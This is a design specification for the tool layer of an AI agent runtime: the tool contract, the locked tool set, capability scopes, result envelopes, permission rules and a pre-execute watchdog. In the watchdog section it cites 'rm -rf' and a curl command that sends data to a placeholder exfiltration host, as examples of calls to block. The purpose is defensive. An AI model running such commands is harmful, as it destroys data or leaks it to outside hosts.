Tools

A tool is a callable capability exposed to the agent. Every tool — locked, agent-specific, MCP, plugin-defined — obeys the same contract: self-describing parameters, declared capability requirements, a uniform result envelope. The agent loop sees one shape; the model learns one mental model.

Tool contract

A tool MUST publish:

| Field | Type | Required | Description |
| --- | --- | --- | --- |
| id | string | yes | Stable identifier. Reused across agents and across sessions. |
| description | string | yes | Prose the model reads to decide whether to call. |
| parameters | JSON Schema | yes | Validated by the runtime before execute. A schema failure is a tool error, not an exception. |
| requires | RequirementSet | yes | The capability surface this tool needs. See Capability requirements. |
| execute | (args, runtime) → Result | yes | The runtime hands a typed capability surface; the tool calls into it. |

The runtime computes the effective capability set for the agent as the union of the agent manifest's requires and every tool's requires. Adding a tool to an agent MUST automatically extend the sandbox; the manifest does not need a parallel update.
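The union described above can be sketched in a few lines. This is a minimal illustration, not the runtime's actual code: the RequirementSet here models only fs and net, and the names unionList and effectiveRequires are hypothetical.

```typescript
// Simplified, hypothetical RequirementSet: only fs and net are modeled.
type RequirementSet = {
  fs?: { read?: string[]; write?: string[] };
  net?: { hosts?: string[] };
};

// Merge two optional pattern lists, dropping duplicates (first-seen order kept).
function unionList(a: string[] = [], b: string[] = []): string[] {
  return Array.from(new Set([...a, ...b]));
}

// Effective set = manifest requires ∪ every tool's requires.
function effectiveRequires(
  manifest: RequirementSet,
  tools: RequirementSet[],
): RequirementSet {
  return [manifest, ...tools].reduce<RequirementSet>(
    (acc, r) => ({
      fs: {
        read: unionList(acc.fs?.read, r.fs?.read),
        write: unionList(acc.fs?.write, r.fs?.write),
      },
      net: { hosts: unionList(acc.net?.hosts, r.net?.hosts) },
    }),
    {},
  );
}
```

Because the set is recomputed from the registered tools, adding a tool widens the sandbox without a separate manifest edit.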

Locked fundamental tools

Every implementation MUST ship the locked set. Models trained on tool use have learned these names; renaming read to something else measurably degrades quality. The set is the smallest union of what a code agent, a design agent, and a research agent all need.

| Id | Purpose | Capability declared |
| --- | --- | --- |
| read | Read a file from the root | fs.read |
| write | Create or overwrite a file in the root | fs.write |
| edit | String-replace edit on an existing file | fs.read + fs.write |
| glob | List files by pattern | fs.read |
| grep | Regex search across the root | fs.read |
| bash | Run a shell command under a sub-policy | shell.run (per-call sub-policy) |
| todo | Write a todo list to a session-scoped store | none (session-internal) |
| task | Spawn a subagent (see subagents) | derived from parent |
| question | Pause and ask the user a structured question | none (host-mediated, synchronous) |
| web_search | Search the web | net.fetch (against the configured provider host) |
| web_fetch | Fetch a URL and convert to text | net.fetch |
| skill | Load a discovered skill's body into context (see skills) | none (session-internal index) |
| tool_search | Discover MCP / extension tools by query (see mcp) | none (session-internal index) |

The locked set is non-opinionated. Each tool is the smallest thing it can be:

  • edit is string-replace, not a model-of-the-codebase.
  • bash is a single command, not a shell session.
  • web_search is a query + results, not a crawler.
  • task is a synchronous (or background) call, not a workflow engine.

Implementors who need richer behavior layer it via MCP, plugin tools, or agent-specific tools. They MUST NOT redefine the locked id with a richer shape — the lock guarantees portability.

Common extensions seen on top of the lock. A code-shaped agent typically ships additional tools beyond the lock. Names are not standardized, but a recurring catalog includes:

| Tool | What it does |
| --- | --- |
| repo_clone | Clone a remote repository into the workspace. |
| repo_overview | Return a structural summary of a repository (file tree + language stats). |
| apply_patch | Apply a unified-diff patch atomically across multiple files. |
| lsp | Surface language-server features (definitions, references, diagnostics). |
| plan / plan_exit | Exit hook for the opinionated plan/build workflow (see subagents). |

These are deliberately out of the lock because they are domain (code-agent) tools, not universal. A design-agent or document-agent host can ship its own equivalents without colliding.

The question tool

question is the only locked tool that pauses the run to wait on a human. The agent emits one or more structured questions; the loop suspends until the host returns answers. Headless hosts (CI, scheduled agents, hosted batch) MUST treat question as a tool error with a fixed message; the model gets the refusal in its next turn and falls back to its best guess.

question({
  questions: [
    {
      question: string,
      header?: string,
      options?: { label: string, description?: string }[],
      multi_select?: boolean,
    }
  ]
}) → { answers: string[][] } // one array per question

The question tool is in the lock because the difference between an agent that asks and one that guesses is product-shaping, not optional. Putting it in the lock means every host wires a question UI (or the headless refusal) once, instead of every agent author re-inventing it.
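A host-side handler for both cases might look like the sketch below. The refusal text, the askUser callback, and the runQuestion name are all hypothetical (the text above only says the message is fixed), and the envelope's metadata field is omitted for brevity.

```typescript
type Question = {
  question: string;
  header?: string;
  options?: { label: string; description?: string }[];
  multi_select?: boolean;
};

type QuestionResult =
  | { type: "output"; data: { answers: string[][] } }
  | { type: "error"; error_text: string };

// Hypothetical wording; what matters is that it never varies.
const HEADLESS_REFUSAL =
  "question is unavailable: this host has no interactive user";

// `askUser` is a hypothetical host callback. A headless host passes nothing.
function runQuestion(
  questions: Question[],
  askUser?: (q: Question) => string[],
): QuestionResult {
  if (!askUser) {
    // Headless: refuse as a tool error so the model sees it on its next turn.
    return { type: "error", error_text: HEADLESS_REFUSAL };
  }
  // Interactive: one answer array per question, in order.
  return { type: "output", data: { answers: questions.map((q) => askUser(q)) } };
}
```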

The task subagent tool

task is in the lock because subagents are a primitive, not a feature. An agent that cannot delegate has a fundamentally different shape from one that can. See subagents for the recursion model, permission inheritance, and inspectability.

The skill and tool_search tools

Both exist to shrink the context the model sees while still letting it reach for things it did not load up front. Skills appear in the system prompt as one-line descriptions; their bodies load on demand through skill. MCP tools, when many, live in an index the model searches with tool_search; only the searched-for tools wire in. See skills and mcp.

The web_search tool

web_search is a fundamental tool that cannot be implemented in-house. The model needs it, so the host wires a real provider (a search API or a hosted search endpoint).

The shape on the wire:

web_search({
  query: string,
  max_results?: int,
}) → { results: { title, url, snippet }[] }

Provider seam: the provider is the host's choice and SHOULD be stable per session (hash the session id to pick) so a flaky provider fails consistently and inspection sees one row, not a random walk.
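One way to get a stable per-session choice is to hash the session id into the provider list. The sketch below uses an FNV-1a style hash purely because it is short; the hash choice, the provider names in the usage note, and the pickProvider function are assumptions, not part of the contract.

```typescript
// FNV-1a style 32-bit hash over UTF-16 code units. Any stable hash would do.
function fnv1a(text: string): number {
  let hash = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    hash ^= text.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193);
  }
  return hash >>> 0; // force an unsigned 32-bit result
}

// The same session id always maps to the same provider.
function pickProvider(sessionId: string, providers: string[]): string {
  if (providers.length === 0) {
    throw new Error("no search providers configured");
  }
  return providers[fnv1a(sessionId) % providers.length];
}
```

Calling pickProvider("ses_123", ["provider-a", "provider-b"]) repeatedly returns the same entry for the lifetime of the session, provided the configured list does not change.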

Cost / quota: the tool implementation MUST cap per-session calls and MUST time out individual calls. Both numbers are host config; sensible defaults are 25 calls/session and 15s per call.
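The two limits can be enforced with a small counter and a timeout wrapper. This is a sketch under assumptions: SessionBudget and withTimeout are hypothetical names, the defaults mirror the numbers above, and the wrapper only stops waiting for the call (it does not cancel the underlying request).

```typescript
// Per-session call counter. The host creates one per session.
class SessionBudget {
  private used = 0;
  private readonly maxCalls: number;

  constructor(maxCalls: number = 25) {
    this.maxCalls = maxCalls;
  }

  // Returns false once the cap is reached; the caller reports a tool error.
  tryConsume(): boolean {
    if (this.used >= this.maxCalls) return false;
    this.used += 1;
    return true;
  }
}

// Reject if `work` has not settled within `ms` milliseconds.
function withTimeout<T>(work: Promise<T>, ms: number = 15000): Promise<T> {
  let timer: ReturnType<typeof setTimeout> | undefined;
  const timeout = new Promise<never>((_, reject) => {
    timer = setTimeout(() => reject(new Error(`timed out after ${ms} ms`)), ms);
  });
  // Clear the timer either way so it does not keep the process alive.
  return Promise.race([work, timeout]).finally(() => {
    if (timer !== undefined) clearTimeout(timer);
  });
}
```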

Capability requirements

A tool's requires declares the runtime surface it depends on:

RequirementSet = {
  fs?: {
    read?: PathPattern[],  // patterns relative to the workspace root
    write?: PathPattern[],
  },
  net?: {
    hosts?: HostPattern[],  // outbound hosts the tool may reach
  },
  shell?: ShellRunRequirement[],  // see ShellRunRequirement below
  capabilities?: CapabilityName[],  // any capability not covered above
}

ShellRunRequirement = {
  cmd: string,  // executable name, e.g. "git", "ls", "node"
  args?: ArgPattern[],  // ordered patterns matched against argv[1..]
}

ArgPattern =
  | string  // exact-match
  | { wildcard: true }  // matches one positional arg
  | { prefix: string }  // matches an arg starting with the prefix
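Matching an argv against a ShellRunRequirement could work roughly as follows. Two behaviors here are assumptions the definitions above do not settle: omitting args accepts any arguments, and a present args list must match the argument count exactly. The function names are hypothetical.

```typescript
type ArgPattern = string | { wildcard: true } | { prefix: string };
type ShellRunRequirement = { cmd: string; args?: ArgPattern[] };

// Check one positional argument against one pattern.
function argMatches(pattern: ArgPattern, arg: string): boolean {
  if (typeof pattern === "string") return pattern === arg; // exact match
  if ("wildcard" in pattern) return true; // any single positional arg
  return arg.startsWith(pattern.prefix); // prefix match
}

// argv[0] is the executable; argv[1..] are matched in order.
function shellAllowed(req: ShellRunRequirement, argv: string[]): boolean {
  const [cmd, ...rest] = argv;
  if (cmd !== req.cmd) return false;
  if (req.args === undefined) return true; // assumption: no patterns = any args
  if (req.args.length !== rest.length) return false; // assumption: exact arity
  return req.args.every((p, i) => argMatches(p, rest[i]));
}
```

For example, { cmd: "git", args: ["log", { prefix: "--format=" }] } admits git log --format=%H but refuses git push origin.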

Path and host patterns support variable expansion. The standard variables:

| Variable | Expands to |
| --- | --- |
| {workspace} | The workspace root (and any additional roots the manifest declares). |
| {ad-hoc} | Directories of currently-open ad-hoc files when the host supports them. |
| {user-data} | The host's per-user data directory. |

Empty expansion (e.g. {workspace} with no open workspace) yields an empty effective scope; the tool's calls fail closed. An undefined variable name (typo) MUST throw at manifest compile time.
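Both rules (fail closed on empty expansion, throw on an unknown name) fall out naturally if a pattern expands to a list. The sketch below is illustrative only: expandPattern and Bindings are hypothetical, and it assumes variable names are lowercase letters and hyphens so that glob braces such as {ts,js} are left alone.

```typescript
const KNOWN_VARIABLES = ["workspace", "ad-hoc", "user-data"];

// Each variable may expand to several directories, or to none.
type Bindings = { [name: string]: string[] };

// Expand one pattern into zero or more concrete patterns.
function expandPattern(pattern: string, bindings: Bindings): string[] {
  const found: string[] = pattern.match(/\{[a-z][a-z-]*\}/g) ?? [];
  const tokens = Array.from(new Set(found)); // handle each variable once
  let results: string[] = [pattern];
  for (const token of tokens) {
    const name = token.slice(1, -1);
    if (KNOWN_VARIABLES.indexOf(name) === -1) {
      // A typo is a compile-time failure, never a silently empty scope.
      throw new Error(`unknown variable ${token} in pattern "${pattern}"`);
    }
    const values = bindings[name] ?? [];
    const next: string[] = [];
    for (const partial of results) {
      for (const value of values) {
        next.push(partial.split(token).join(value));
      }
    }
    results = next; // no values => empty list => nothing is in scope
  }
  return results;
}
```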

Tool result envelope

Every tool returns the same envelope:

{
  type: "output" | "error",
  data: <tool-specific JSON>,  // when "output"
  error_text: string,  // when "error"
  metadata: {
    duration_ms: int,
    truncated?: bool,  // see Truncation below
    output_path?: string,  // see Truncation below
  }
}

The uniform envelope serves three downstream layers:

  • The recorder, which writes the result to a chat_parts row.
  • The replay layer, which re-emits the result deterministically.
  • The model itself, which develops one mental model for "what comes back from a tool."

Truncation

Tool outputs can be enormous (a grep over a large repository, a long file read). The runtime applies a per-tool max output size; bytes beyond that go to a sidecar file path, and the result carries the head + a truncated: true flag.

{
  type: "output",
  data: { head: "<first N bytes>" },
  metadata: {
    truncated: true,
    output_path: "/tmp/grep-output-prt_…",
  }
}

The model sees the head and the path; if it needs more, it calls read on the path. The sidecar file lives under the host's per-session working directory; the runtime cleans it up when the session closes.

Per-tool defaults (recommended):

| Tool | Default max output | Notes |
| --- | --- | --- |
| read | 200 KB | Larger reads go through read with byte ranges, not the truncate path. |
| glob | 1000 entries | The 1001st entry triggers truncation. |
| grep | 200 matches | The 201st match triggers truncation. |
| bash | 200 KB combined stdout+stderr | Anything past the limit goes to the sidecar path. |
| web_fetch | 200 KB | Measured after text extraction, not on raw HTML. |
| Other | implementation-defined | |

Hosts MAY tune these per product. The shape (head + output_path) is fixed.
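For an entry-counted tool such as glob, the truncation path might be sketched like this. Several details are assumptions: the head is modeled as an array of entries rather than a byte string, the sidecar receives the full output rather than only the overflow, and writeSidecar is a hypothetical host hook that returns the file path.

```typescript
type OutputEnvelope<T> = {
  type: "output";
  data: T;
  metadata: { duration_ms: number; truncated?: boolean; output_path?: string };
};

// Keep the first `maxEntries` entries inline; spill to a sidecar beyond that.
function truncateEntries(
  entries: string[],
  maxEntries: number,
  durationMs: number,
  writeSidecar: (full: string) => string, // hypothetical: persists, returns path
): OutputEnvelope<{ head: string[] }> {
  if (entries.length <= maxEntries) {
    return {
      type: "output",
      data: { head: entries },
      metadata: { duration_ms: durationMs },
    };
  }
  // Assumption: the sidecar holds the complete output, one entry per line.
  const outputPath = writeSidecar(entries.join("\n"));
  return {
    type: "output",
    data: { head: entries.slice(0, maxEntries) },
    metadata: { duration_ms: durationMs, truncated: true, output_path: outputPath },
  };
}
```

With maxEntries set to 1000, a result of exactly 1000 entries is returned whole and the 1001st entry is the one that triggers the sidecar.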

Permissions at the tool boundary

Permissions are a ruleset, not an allowlist. A rule is (permission, pattern, action):

  • permission: a tool id (bash), a capability name (fs.write), or a wildcard (*).
  • pattern: the argument pattern the rule applies to (a shell command pattern, a filesystem path, an HTTP host). Patterns support glob (**/*.py) and prefix matching.
  • action: allow / deny / ask. Default ask.

Rule sources

Rules layer across three scopes (manifest / session / project). The most specific matching rule wins; a manifest deny cannot be turned into an allow by a session or project rule. See session / permission scopes for the scope table and evaluation order, and subagents / permission inheritance for the deny-inheritance rule.

Headless hosts

Hosts without a user (CI, scheduled agents, hosted batch) MUST treat ask as deny. The agent system MUST NOT invent answers.
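Rule evaluation, including the headless downgrade, can be sketched as below. This is a simplification under stated assumptions: patterns are either exact text or a prefix ending in "*" (no full glob support), "most specific" is approximated by the longest pattern, and the real evaluation order lives in the scope table referenced above. The names Rule and decide are hypothetical.

```typescript
type Action = "allow" | "deny" | "ask";
type Scope = "manifest" | "session" | "project";
type Rule = { scope: Scope; permission: string; pattern: string; action: Action };

// Assumption: exact text, or a prefix pattern ending in "*".
function patternMatches(pattern: string, value: string): boolean {
  return pattern.endsWith("*")
    ? value.startsWith(pattern.slice(0, -1))
    : pattern === value;
}

function decide(
  rules: Rule[],
  permission: string,
  value: string,
  headless: boolean,
): Action {
  const matching = rules.filter(
    (r) =>
      (r.permission === permission || r.permission === "*") &&
      patternMatches(r.pattern, value),
  );
  let action: Action = "ask"; // default when no rule matches
  if (matching.some((r) => r.scope === "manifest" && r.action === "deny")) {
    action = "deny"; // a manifest deny cannot be overridden
  } else if (matching.length > 0) {
    // Assumption: the longest pattern counts as the most specific.
    action = matching.reduce((best, r) =>
      r.pattern.length > best.pattern.length ? r : best,
    ).action;
  }
  // Headless hosts have nobody to ask, so ask becomes deny.
  return headless && action === "ask" ? "deny" : action;
}
```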

The watchdog

A pre-execute hook on every tool call. The watchdog sees the tool id, the validated arguments, the agent's manifest, and the session id, and returns one of:

  • allow — the call proceeds.
  • deny(reason) — the call fails. The model gets the reason as a tool error and can adjust on the next turn.
  • ask — only on hosts with a human; the host shows the call, the user picks once / always / reject. Headless hosts treat as deny.

The watchdog is pre-execute because the damaging act of a shell call (rm -rf, curl <data> exfil.example.com) is the call itself. Post-call rejection is too late.

The watchdog is independent of capability scopes. It can refuse calls that the manifest's requires would have allowed; it cannot permit calls the manifest's requires would have refused. The runtime's capability check runs before the watchdog as the first defense.
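The ordering above (capability check first, then the watchdog, which can only narrow) might be wired like this. All names are hypothetical, the manifest argument the watchdog receives is omitted, and persisting an "always" answer is left out.

```typescript
type Verdict =
  | { kind: "allow" }
  | { kind: "deny"; reason: string }
  | { kind: "ask" };

type ToolCall = { toolId: string; args: unknown; sessionId: string };

type Gate = {
  capabilityCheck: (call: ToolCall) => boolean; // hypothetical runtime hook
  watchdog: (call: ToolCall) => Verdict;
  askUser?: (call: ToolCall) => "once" | "always" | "reject"; // absent when headless
};

function gateCall(call: ToolCall, gate: Gate): Verdict {
  // First defense: out-of-scope calls never reach the watchdog.
  if (!gate.capabilityCheck(call)) {
    return { kind: "deny", reason: "outside the declared capability scope" };
  }
  // The watchdog can refuse an in-scope call, but has no way to widen scope.
  const verdict = gate.watchdog(call);
  if (verdict.kind !== "ask") return verdict;
  if (!gate.askUser) {
    return { kind: "deny", reason: "approval required but the host is headless" };
  }
  return gate.askUser(call) === "reject"
    ? { kind: "deny", reason: "rejected by the user" }
    : { kind: "allow" };
}
```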

Defense in depth

Three independent layers, any one of which is sufficient for its kind of failure:

  1. Capability check: the runtime refuses out-of-scope paths and hosts at the API boundary. No model output reaches the OS.
  2. Watchdog: refuses categories of arguments the capability check cannot express ("no commands that look like exfiltration").
  3. Environment sandbox: refuses anything the runtime mistakenly lets through. See environments.

A change to one layer SHOULD NOT require changes to the others.

ACP tool kind taxonomy

When the agent is fronted by an ACP adapter, every emitted tool call carries a kind (read / edit / search / execute / fetch / think / other and a few more). The kind drives client UI — icon, inline diff renderer, terminal pane.

The full mapping from locked tools to ACP kinds lives in acp / tool kind mapping. Hosts without an ACP adapter ignore the taxonomy.

Implementor checklist

A conforming tool implementation MUST:

  • Publish id, description, JSON-schema parameters, and requires at registration.
  • Validate parameters before calling execute. A schema failure yields a tool error with the schema validation message; it MUST NOT throw.
  • Surface side effects only through the typed runtime — never reach into the host's filesystem, network, or shell directly.
  • Return the uniform { type, data | error_text, metadata } envelope.
  • Honor the abort signal: when the session aborts, an in-flight tool SHOULD stop work and return an error or a partial result.
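The validate-then-execute items of the checklist can be sketched as one wrapper. Assumptions are flagged in the comments: validate is a hypothetical stand-in for real JSON Schema validation, execute is synchronous and takes no runtime argument, and converting a thrown exception into an error envelope is this sketch's choice rather than something the checklist states.

```typescript
type Metadata = { duration_ms: number };
type Envelope =
  | { type: "output"; data: unknown; metadata: Metadata }
  | { type: "error"; error_text: string; metadata: Metadata };

type Tool = {
  id: string;
  // Hypothetical stand-in for JSON Schema validation: message, or null if valid.
  validate: (args: unknown) => string | null;
  // Simplified: the real contract also passes the typed runtime.
  execute: (args: unknown) => unknown;
};

function runTool(tool: Tool, args: unknown): Envelope {
  const started = Date.now();
  const meta = (): Metadata => ({ duration_ms: Date.now() - started });

  // Validate before execute; a schema failure is a tool error, not a throw.
  const problem = tool.validate(args);
  if (problem !== null) {
    return { type: "error", error_text: `invalid parameters: ${problem}`, metadata: meta() };
  }
  try {
    return { type: "output", data: tool.execute(args), metadata: meta() };
  } catch (err) {
    // Assumption: unexpected exceptions are also reported through the envelope.
    const text = err instanceof Error ? err.message : String(err);
    return { type: "error", error_text: text, metadata: meta() };
  }
}
```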

See also

  • Foundations — the AI SDK chunk shape tool I/O rides on, and the streaming substrate.
  • Skills — the skill tool's library.
  • MCP — the tool_search tool's catalog.
  • Subagents — the task tool's recursion model.
  • Environments — which capabilities each environment exposes.
  • ACP integration — the kind taxonomy and the session/request_permission wire.